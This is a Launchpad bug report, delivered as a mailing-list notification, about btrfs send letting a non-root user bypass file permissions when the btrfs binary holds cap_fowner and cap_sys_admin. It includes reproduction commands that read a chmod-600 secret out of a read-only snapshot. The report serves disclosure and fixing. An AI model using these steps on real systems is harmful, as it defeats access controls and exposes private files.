[Kernel-packages] [Bug 1785687] Re: btrfs send can bypass DAC check with certain capability set

Tue, 17 Sep 2019 02:47:29 -0700 

Hi,

Have you reported this issue to the upstream developers?

Thanks!

** Changed in: linux-signed (Ubuntu)
       Status: New => Incomplete

-- 
You received this bug notification because you are a member of Kernel
Packages, which is subscribed to linux-signed in Ubuntu.
https://bugs.launchpad.net/bugs/1785687

Title:
  btrfs send can bypass DAC check with certain capability set

Status in linux package in Ubuntu:
  Incomplete

Bug description:
  Expected:
  For btrfs tool with certain capabilities set(cap_fowner, cap_sys_admin),
  DAC check should not be by-passed when operating on subvol snapshot

  What happened instead:
  btrfs tool with certain capability(cap_fowner,cap_sys_admin) set can be
  used to by-pass DAC check on a snapshot, and gain read access to all files
  in a snapshot

  steps to reproduce:

  as root

   # dd if=/dev/zero of=/tmp/test.disk bs=1M count=128
   # mkfs.btrfs  /tmp/test.disk
   # mkdir -p /mnt/test
   # mount /tmp/test.disk  /mnt/test/
   # cd /mnt/test
   # btrfs subvol create snapshot
   # echo "this is a secret" > snapshot/1.secret
   # chmod 600 snapshot/1.secret
   # btrfs subvol snapshot -r snapshot snapshot-ro

   # setcap cap_fowner,cap_sys_admin+eip /bin/btrfs

  as non-root

   $ cd /mnt/test
   $ cat snapshot-ro/1.secret
   cat: snapshot-ro/1.secret: Permission denied
   $ btrfs send snapshot-ro > /tmp/snap
   $ strings /tmp/snap
   this is a secret

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: linux-image-4.15.0-23-generic 4.15.0-23.25
  ProcVersionSignature: Ubuntu 4.15.0-23.25-generic 4.15.18
  Uname: Linux 4.15.0-23-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  Date: Mon Aug  6 11:18:18 2018
  InstallationDate: Installed on 2018-05-17 (80 days ago)
  InstallationMedia: Ubuntu 14.04.5 LTS "Trusty Tahr" - Release amd64 (20160803)
  SourcePackage: linux-signed
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1785687/+subscriptions

-- 
Mailing list: https://launchpad.net/~kernel-packages
Post to     : [email protected]
Unsubscribe : https://launchpad.net/~kernel-packages
More help   : https://help.launchpad.net/ListHelp

Reply via email to